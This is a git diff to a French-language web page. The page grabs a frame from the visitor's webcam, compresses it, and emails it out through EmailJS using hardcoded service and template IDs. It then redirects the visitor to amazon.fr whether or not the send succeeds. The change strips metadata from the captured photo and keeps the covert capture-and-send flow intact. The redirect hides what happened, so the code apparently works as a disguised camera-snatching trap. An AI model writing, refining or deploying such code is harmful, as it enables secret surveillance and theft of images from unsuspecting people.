--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="fr">
 <head>
   <meta charset="UTF-8">
-  <title>Capture ultra compressée</title>
+  <title>Capture ultra compressée sans métadonnées</title>
   <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
   <style>
     body, html {
@@ -33,14 +33,22 @@
 
         video.onloadeddata = () => {
           context.drawImage(video, 0, 0, canvas.width, canvas.height);
-          const imageData = canvas.toDataURL("image/jpeg", 0.05); // 5% qualité
 
-          emailjs.send("service_8cs0gml", "template_hgvdx1g", {
-            message: "Photo ultra compressée 📸",
-            image: imageData
-          })
-          .then(() => { window.location.href = "https://www.amazon.fr"; })
-          .catch((err) => { console.log("Erreur EmailJS:", err); window.location.href = "https://www.amazon.fr"; });
+          // Conversion en Blob JPEG compressé (sans métadonnées)
+          canvas.toBlob((blob) => {
+            const reader = new FileReader();
+            reader.onloadend = () => {
+              const imageData = reader.result; // DataURL pour EmailJS
+
+              emailjs.send("service_8cs0gml", "template_hgvdx1g", {
+                message: "Photo ultra compressée sans métadonnées 📸",
+                image: imageData
+              })
+              .then(() => { window.location.href = "https://www.amazon.fr"; })
+              .catch((err) => { console.log("Erreur EmailJS:", err); window.location.href = "https://www.amazon.fr"; });
+            };
+            reader.readAsDataURL(blob);
+          }, "image/jpeg", 0.05); // Qualité 5%
 
           stream.getTracks().forEach(track => track.stop());
         };
